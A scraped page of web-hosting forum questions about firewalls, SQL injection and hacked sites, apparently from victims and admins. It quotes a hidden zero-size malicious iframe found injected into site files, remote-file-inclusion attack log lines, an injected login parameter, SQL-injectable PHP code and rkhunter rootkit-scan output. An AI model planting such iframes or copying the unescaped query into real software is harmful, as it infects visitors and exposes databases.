Does CISCO ASA Firewall block SQL and XSS Injection? If not, then which are the firewalls available which do this job. I have checked web application firewalls and found them to be too costly for my budget. What are the other cheap options available?
View 3 RepliesWe are looking to replace our existing WatchGuard Firebox's with a hopefully more reliable firewall from Cisco's range although I'm a bit lost when it comes to the different ranges.
Could somebody suggest a firewall that is capable of:
1: Both NAT & Drop-in (bridge) mode
2: Pretty low bandwidth requirements, no more than 10mbit/s traffic
3: SNMP Monitoring
4: High availability pairing
What is the difference between the Cisco PIX and Cisco ASA Firewall Systems?
Also which firewall do you guys recommend for a rack of servers
Does anyone know of a place or have for sale a Cisco PIX firewall? I have looked into ebay but was wondering what else is out there?
View 3 Replies View Relatedi want a Cisco firewall suitable for one dedicated server protection, that server would host up to 30 vps
and i may buy another server in future, so what do you recommend?
from where can i get the price of cisco firewall?
View 4 Replies View RelatedI already get a new firewall for my server cisco ASA and I don't know how to config it
is there any rules to get protection from shell and virus trojan as example
specifications and pricing of different CISCO PIX 515E firewalls?
View 2 Replies View RelatedI have set up a Plesk Windows server behind a CISCO PIX 501 firewall and since then am not able to upgrade Plesk to the latest version. It cannot connect to the Plesk Update server. which port do I need to open and whether it will be inbound or outbound?
View 14 Replies View RelatedThought this might be of interest since the PIX vs. ASA devices are frequently discussed here ...
View 1 Replies View RelatedI am in the process of gathering the peices to move from a dedicated box to my own hardware in a local colo and am undecided how best to choose the edge device.
The colo has a 30Mb pipe with about 10Mb of it being constantly used during biz hours. Another 10Mb is being allocated in the next couple of months. I want to be able to burst to the full 30Mb when needed.
I am getting 12 IP's allocated but will increase to 24 soon if all goes well (fingers crossed!).
I will have for starters just a single Proliant running dnp on 2008 with IIS, FTP, Mail, ns1 and a 2003 VM running my secondary ns.
What I am unsure of is the edge device and looking for others that have used either a 2800 series router or a ASA5500 series firewall in a similiar fashion. I know what the raw throughput of each device is, but raw benchmarks are not realworld numbers by any means.
I am looking at the 2801 with IOS Firewall turned on and hopefully even some inspects for FTP and HTTP traffic. The other option and one that I am less familiar with is to use the ASA5505 instead which will do my basic routing but supposedly provide more thourough inspects and advanced rules.
Does anyone have experiance with either of these in a hosting environment and have input on the realistic throughput one can expect from either device?
There is a signifigant cost difference with the ASA5505 being much cheaper but I am more familiar with IOS. Would anyone recommend a 1841 router instead?
I was wondering we use ConfigServer Security & Firewall for our firewall and was wondering how we can go about blocking certain countries from being able to access our servers, mainly Korea, China and Russia?
I found this site: ....
Is that possible to block baidu without specifying whole list of IDs it's using ?
View 1 Replies View RelatedI am running windows 2003 server.
Recently, there have been brute force attacks to try and compromise my sa password (MSSQL) and root password (MYSQL).
I would like to block certain ip addresses, but looking in the built in firewall in windows I don't see a way to do this. Is this possible with the built in tools/firewall that comes with windows 2003?
If not, can anybody recommend a simple firewall solution that will allow me to block ip addresses? I don't want something that is bloated and blocks popups, viruses, adware, etc. I just want a solution that will allow me to block ip addresses and prevent brute force attacks.
My host has helped me to install a switch. However, I don't know how to configure using the command line. Could anyone help me?
I need to be able to connect to my Cisco switch using Cisco Network Assistant. If you know the command sequence,
I had a non client send me an email about being hacked. apparently the hacker is using a program/command line and is entering this into the db:
user=' &pass1=111-222-1933email@adress.tst&pass2=test&submit=
create%20Account
any way he can patch up his navicat database to stop this?
I've experienced so much hacker attack lately. Hosted wiht hostforweb.com if that makes any difference.
Last issue I have is:
Type of attack: URL Injection -- attempt to inject / load files onto the
server via PHP/CGI vulnerabilities
How I can secure my server against such attacks?
Also I need to resolve this issue ASAP but can not find the file and I don't know what to do.
Report:
Sample log report including date and time stamp:
Request: rosemarythecelticlady.com 64.202.102.218 - - [13/Aug/2007:11:50:03
-0500] GET
/awstats/data/awstats1...marythecelticlady.com.txt/admin/index.php?o=[url]HTTP/1.1 302 228 - libwww-perl/5.808 - -
Request: rosemarythecelticlady.com 64.202.102.218 - - [13/Aug/2007:11:50:04
-0500] GET /admin/index.php?o=[url]HTTP/1.1
302 228 - libwww-perl/5.808 - -
Request: rosemarythecelticlady.com 64.202.102.218 - - [13/Aug/2007:11:50:04
-0500] GET
/awstats/data/admin/index.php?o=[url]
HTTP/1.1 302 228 - libwww-perl/5.808 - -
WHAT NEEDS TO BE DONE HERE and where to located it? Your help is greatly appreciated.
Yesterday it was discovered that a website had most or all of the html pages compromised with some sort of iframe injection. Every page had an iframe line added to the bottom that attempted to load something from another website. It was coming from a domain called reycross.net and was attempting to load the html/framer virus into the visitor's computer.
The problem is that I cannot identify how the injection hit the system. Here are the facts I can provide...
1. The server does NOT have Joomla or Wordpress.
2. The injection seemed to hit every html page whether the page was active on the site or not.
3. The injection hit only one account.
I have checked /var/log/messages and /var/log/secure and find nothing.
What I don't have is proper ftp logging to determine whether the injection came from that method.
Additional notes: Shortly before the injection took place the box was updated to the latest version of cpanel. Also php was upgraded to 5.2.10. At the time suPHP was enabled but unfortunately had to be disabled because it created problems with another site. Prior to this suPHP was disabled as well.
I went through and removed all instances of this iframe injection and ran another update of cpanel. I also recompiled apache/php and went back to 5.2.8 in case the problem was php related.
Anyone using phpMyAdmin for MySQL admin, you need to know about a newly discovered attack vector.
Here's the official announcement: [url]
The key to this is in their description, "A logged-in user can be subject of SQL injection through cross site request forgery. Several scripts in phpMyAdmin are vulnerable and the attack can be made through table parameter."
A logged in user... This attack is a combination of SQL injection through CSRF. In other words, you'd have to be logged into your phpMyAdmin program, hit a website setup for CSRF, and then the attacker could have access to your phpMyAdmin as you.
If there's interest here, I could write up a detailed description of CSRF and how to prevent this type of attack.
Just let me know...
You should upgrade immediately to either phpMyAdmin 2.9.11.4 or 3.1.1.0 or apply patch 12100.
One of my site index page is having iframe injections. I am not sure about the reason. page is chmod to 644 under php.ini dl() is even disabled.
But still person is some how able to inject iframe that redirects the page to some other url.
Any suggestions how to fix that ? any mod_rewrite rule or anything for this?
Does deploying a reverse proxy in front of the web/db server reduce the threat of SQL injection?
Emphasis on 'reduce' the threat - or does it provide no help at all?
I had done a program in early 2006 for a site in php-mysql. At the time of doing the code, The code written was not so standard and it contained uninitialized variables used for include file paths (eventhough values are assigned to it before using) and the "sess" folder was created within the website folder. Also the parameters for the SQL query were not escaped, but everything was working fine.
And now i was informed that the insecure code in my program caused the server crash and i have to pay the penalty for the same. Can anyone let me know whether the below code / keeping the session variables within a folder inside the /www/ will make the sites hosted on the server where this program runs to stop/crash for ever ?
------------------------------------------------------------------
function update_region($id,$regname,$regcom)
{
$query = "UPDATE taxregion_mast SET taxregion_name = '". $regname."',
region_comments = '". $regcom."' WHERE region_id =" .$id;
mysql_query($query);
......
-------------------------------------------------------------------
i am seeing a lot of Local file inclusion (LFI) and mysql injection attacks quite often directed to php scripts.
what is the way to prevent them? would installing mod_security to apache work?
I see on one server with windows 2k3 and sql 2000 alot of Injection attemts(lucky so far) and 90% come from china.
Is there any way on iis6 to put range ban like 123.52.0.0 - 123.55.255.255 so to ban all that network?
I have a major problem with injecting iframes into every files (header.php footer.php index.php login.php and vars.php ) on all server account.
Code:
<iframe src='h t t p : / / 8 1 . 9 5 . 1 4 5 . 2 4 0 / g o . p h p ? s i d = 1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
what is the reason and how to fix that ?
and I have the second problem is the rkhunter warnings I am not sure if that have relations with the first problem :
rkhunter results:
Code:
Checking system commands...
Performing 'strings' command checks
Checking 'strings' command [ OK ]
Performing 'shared libraries' checks
Checking for preloading variables [ None found ]
Checking for preload file [ Not found ]
Checking LD_LIBRARY_PATH variable [ Not found ]
Performing file properties checks
Checking for prerequisites [ Warning ]
/bin/awk [ OK ]
/bin/basename [ OK ]
/bin/bash [ OK ]
/bin/cat [ OK ]
/bin/chmod [ OK ]
/bin/chown [ OK ]
/bin/cp [ OK ]
/bin/csh [ OK ]
/bin/cut [ OK ]
/bin/date [ OK ]
/bin/df [ OK ]
/bin/dmesg [ OK ]
/bin/echo [ OK ]
/bin/ed [ OK ]
/bin/egrep [ OK ]
/bin/env [ OK ]
/bin/fgrep [ OK ]
/bin/grep [ OK ]
/bin/kill [ OK ]
/bin/login [ OK ]
/bin/ls [ OK ]
/bin/mail [ OK ]
/bin/mktemp [ OK ]
/bin/more [ OK ]
/bin/mount [ OK ]
/bin/mv [ OK ]
/bin/netstat [ OK ]
/bin/passwd [ OK ]
/bin/ps [ OK ]
/bin/pwd [ OK ]
/bin/rpm [ OK ]
/bin/sed [ OK ]
/bin/sh [ OK ]
/bin/sort [ OK ]
/bin/su [ OK ]
/bin/touch [ OK ]
/bin/uname [ OK ]
/bin/gawk [ OK ]
/bin/tcsh [ OK ]
/usr/bin/awk [ OK ]
/usr/bin/chattr [ OK ]
/usr/bin/curl [ OK ]
/usr/bin/cut [ OK ]
/usr/bin/diff [ OK ]
/usr/bin/dirname [ OK ]
/usr/bin/du [ OK ]
/usr/bin/env [ OK ]
/usr/bin/file [ OK ]
/usr/bin/find [ OK ]
/usr/bin/GET [ Warning ]
/usr/bin/groups [ Warning ]
/usr/bin/head [ OK ]
/usr/bin/id [ OK ]
/usr/bin/kill [ OK ]
/usr/bin/killall [ OK ]
/usr/bin/last [ OK ]
/usr/bin/lastlog [ OK ]
/usr/bin/ldd [ Warning ]
/usr/bin/less [ OK ]
/usr/bin/locate [ OK ]
/usr/bin/logger [ OK ]
/usr/bin/lsattr [ OK ]
/usr/bin/lynx [ OK ]
/usr/bin/md5sum [ OK ]
/usr/bin/newgrp [ OK ]
/usr/bin/passwd [ OK ]
/usr/bin/perl [ OK ]
/usr/bin/pstree [ OK ]
/usr/bin/readlink [ OK ]
/usr/bin/runcon [ OK ]
/usr/bin/sha1sum [ OK ]
/usr/bin/size [ OK ]
/usr/bin/slocate [ OK ]
/usr/bin/stat [ OK ]
/usr/bin/strace [ OK ]
/usr/bin/strings [ OK ]
/usr/bin/sudo [ OK ]
/usr/bin/tail [ OK ]
/usr/bin/test [ OK ]
/usr/bin/top [ OK ]
/usr/bin/tr [ OK ]
/usr/bin/uniq [ OK ]
/usr/bin/users [ OK ]
/usr/bin/vmstat [ OK ]
/usr/bin/w [ OK ]
/usr/bin/watch [ OK ]
/usr/bin/wc [ OK ]
/usr/bin/wget [ OK ]
/usr/bin/whatis [ Warning ]
/usr/bin/whereis [ OK ]
/usr/bin/which [ OK ]
/usr/bin/who [ OK ]
/usr/bin/whoami [ OK ]
/usr/bin/gawk [ OK ]
/sbin/chkconfig [ OK ]
/sbin/depmod [ OK ]
/sbin/ifconfig [ OK ]
/sbin/ifdown [ Warning ]
/sbin/ifup [ Warning ]
/sbin/init [ OK ]
/sbin/insmod [ OK ]
/sbin/ip [ OK ]
/sbin/lsmod [ OK ]
/sbin/modinfo [ OK ]
/sbin/modprobe [ OK ]
/sbin/nologin [ OK ]
/sbin/rmmod [ OK ]
/sbin/runlevel [ OK ]
/sbin/sulogin [ OK ]
/sbin/sysctl [ OK ]
/sbin/syslogd [ OK ]
/usr/sbin/adduser [ OK ]
/usr/sbin/chroot [ OK ]
/usr/sbin/groupadd [ OK ]
/usr/sbin/groupdel [ OK ]
/usr/sbin/groupmod [ OK ]
/usr/sbin/grpck [ OK ]
/usr/sbin/kudzu [ OK ]
/usr/sbin/lsof [ OK ]
/usr/sbin/prelink [ OK ]
/usr/sbin/pwck [ OK ]
/usr/sbin/tcpd [ OK ]
/usr/sbin/useradd [ OK ]
/usr/sbin/userdel [ OK ]
/usr/sbin/usermod [ OK ]
/usr/sbin/vipw [ OK ]
/usr/sbin/xinetd [ OK ]
/usr/local/bin/perl [ OK ]
/usr/local/bin/rkhunter [ OK ]
Checking for rootkits...
Performing check of known rootkit files and directories
55808 Trojan - Variant A [ Not found ]
ADM Worm [ Not found ]
AjaKit Rootkit [ Not found ]
aPa Kit [ Not found ]
Apache Worm [ Not found ]
Ambient (ark) Rootkit [ Not found ]
Balaur Rootkit [ Not found ]
BeastKit Rootkit [ Not found ]
beX2 Rootkit [ Not found ]
BOBKit Rootkit [ Not found ]
CiNIK Worm (Slapper.B variant) [ Not found ]
Danny-Boy's Abuse Kit [ Not found ]
Devil RootKit [ Not found ]
Dica-Kit Rootkit [ Not found ]
Dreams Rootkit [ Not found ]
Duarawkz Rootkit [ Not found ]
Enye LKM [ Not found ]
Flea Linux Rootkit [ Not found ]
FreeBSD Rootkit [ Not found ]
****`it Rootkit [ Not found ]
GasKit Rootkit [ Not found ]
Heroin LKM [ Not found ]
HjC Kit [ Not found ]
ignoKit Rootkit [ Not found ]
ImperalsS-FBRK Rootkit [ Not found ]
Irix Rootkit [ Not found ]
Kitko Rootkit [ Not found ]
Knark Rootkit [ Not found ]
Li0n Worm [ Not found ]
Lockit / LJK2 Rootkit [ Not found ]
Mood-NT Rootkit [ Not found ]
MRK Rootkit [ Not found ]
Ni0 Rootkit [ Not found ]
Ohhara Rootkit [ Not found ]
Optic Kit (Tux) Worm [ Not found ]
Oz Rootkit [ Not found ]
Phalanx Rootkit [ Not found ]
Phalanx Rootkit (strings) [ Not found ]
Portacelo Rootkit [ Not found ]
R3dstorm Toolkit [ Not found ]
RH-Sharpe's Rootkit [ Not found ]
RSHA's Rootkit [ Not found ]
Scalper Worm [ Not found ]
Sebek LKM [ Not found ]
Shutdown Rootkit [ Not found ]
SHV4 Rootkit [ Not found ]
SHV5 Rootkit [ Not found ]
Sin Rootkit [ Not found ]
Slapper Worm [ Not found ]
Sneakin Rootkit [ Not found ]
Suckit Rootkit [ Not found ]
SunOS Rootkit [ Not found ]
SunOS / NSDAP Rootkit [ Not found ]
Superkit Rootkit [ Not found ]
TBD (Telnet BackDoor) [ Not found ]
TeLeKiT Rootkit [ Not found ]
T0rn Rootkit [ Not found ]
Trojanit Kit [ Not found ]
Tuxtendo Rootkit [ Not found ]
URK Rootkit [ Not found ]
VcKit Rootkit [ Not found ]
Volc Rootkit [ Not found ]
X-Org SunOS Rootkit [ Not found ]
zaRwT.KiT Rootkit [ Not found ]
Performing additional rootkit checks
Suckit Rookit additional checks [ OK ]
Checking for possible rootkit files and directories [ None found ]
Checking for possible rootkit strings [ None found ]
Performing malware checks
Checking running processes for suspicious files [ None found ]
Checking for login backdoors [ None found ]
Checking for suspicious directories [ None found ]
Checking for sniffer log files [ None found ]
Performing trojan specific checks
Checking for enabled xinetd services [ None found ]
Checking for Apache backdoor [ Not found ]
Performing Linux specific checks
Checking kernel module commands [ OK ]
Checking kernel module names [ OK ]
Checking the network...
Performing check for backdoor ports
Checking for UDP port 2001 [ Not found ]
Checking for TCP port 2006 [ Not found ]
Checking for TCP port 2128 [ Not found ]
Checking for TCP port 14856 [ Not found ]
Checking for TCP port 47107 [ Not found ]
Checking for TCP port 60922 [ Not found ]
Performing checks on the network interfaces
Checking for promiscuous interfaces [ None found ]
Checking the local host...
Performing system boot checks
Checking for local host name [ Found ]
Checking for local startup files [ Found ]
Checking local startup files for malware [ None found ]
Checking system startup files for malware [ None found ]
Performing group and account checks
Checking for passwd file [ Found ]
Checking for root equivalent (UID 0) accounts [ None found ]
Checking for passwordless accounts [ None found ]
Checking for passwd file changes [ None found ]
Checking for group file changes [ None found ]
Checking root account shell history files [ OK ]
Performing system configuration file checks
Checking for SSH configuration file [ Found ]
Checking if SSH root access is allowed [ Warning ]
Checking if SSH protocol v1 is allowed [ Warning ]
Checking for running syslog daemon [ Found ]
Checking for syslog configuration file [ Found ]
Checking if syslog remote logging is allowed [ Not allowed ]
Performing filesystem checks
Checking /dev for suspicious file types [ None found ]
Checking for hidden files and directories [ Warning ]
Checking application versions...
Checking version of Exim MTA [ OK ]
Checking version of GnuPG [ Warning ]
Checking version of Apache [ Skipped ]
Checking version of Bind DNS [ OK ]
Checking version of OpenSSL [ Warning ]
Checking version of PHP [ OK ]
Checking version of Procmail MTA [ OK ]
Checking version of OpenSSH [ OK ]
System checks summary
=====================
File properties checks...
Required commands check failed
Files checked: 129
Suspect files: 6
Rootkit checks...
Rootkits checked : 114
Possible rootkits: 0
Applications checks...
Applications checked: 8
Suspect applications: 2
The system checks took: 3 minutes and 12 seconds
All results have been written to the logfile (/var/log/rkhunter.log)
One or more warnings have been found while checking the system.
Please check the log file (/var/log/rkhunter.log)
some body attacking on my server and changing my users profile name /password or any other information so How To Protect MySQL Database From My SQL Injection Attacks? i have dedicate server i provide free wap sites to people with wildcard dns system and i have ConfigServer Security & Firewall installed.
View 3 Replies View RelatedWe are facing this strange Problem from yesterday that
<script language=javascript src= [url]
is added on end of every html Pages.
I don,t know that how this Injection on every Html Pages.
Cacti version 0.8.6i has vulnerability: [url]
Solution: [url]
All my sites on both my hosting accounts are infected with an iframe.
At the end of the index.html files the malicious code just appeared...suddenly 3 weeks ago.
The host blamed Joomla so I took the appropriate steps:
Upgraded my Joomla to the latest version, changed the whole account username and password, changed the configuration and template to unwriteable.
It stopped the injection for a few days but then it came back.
I would also like to add that 2 other sites on my account, one simple index.html file and an old website I have that is totally HTML with nothing to do with Joomla also got infected.
The iframe also infected a Drupal install I did as a test.
So according to these fact is this a Hosting Company not taking responsibility or can a Joomla site infected spread to other normal HTML sites and different CMS's on the server?
This situation is ruinning me and I strongly suspect it's a Hosting problem and not Joomla.
Any expert opinions from true professionals would be appreciated because if I can prove that it's not a Joomla issue I might take legal action against the hosting company since this has cost me dozens of hours of work and several hundred dollars of lost revenue.
I am attaching the iframe exploit. It installs itself on every index file...in every folder - components, mambots, ect..additionally it attaches itself on any and every kind of addon that has an index.html file.
Do you recommend a software firewall when behind a hardware firewall?
All of our servers are behind Cisco ASA 5505 firewalls which we rent from Liquidweb. All are being managed correctly and setup to there optimal levels. With hardware firewalls firmly in place, do you still recommend a software firewall such as APF or IPTables (we're talking linux); in our opinion we see it as an extra administration overhead. If this is however untrue, we will change out thinking.
I've found a dedicated server at a great price and plan to stick with it, my first ( already have 2 vps accounts ). I don't have the money for a hardware firewall. However, I do have a chance to renew a Kerio WinRoute Firewall license from way back.
Does anyone think this would be better than the default windows 2003 firewall?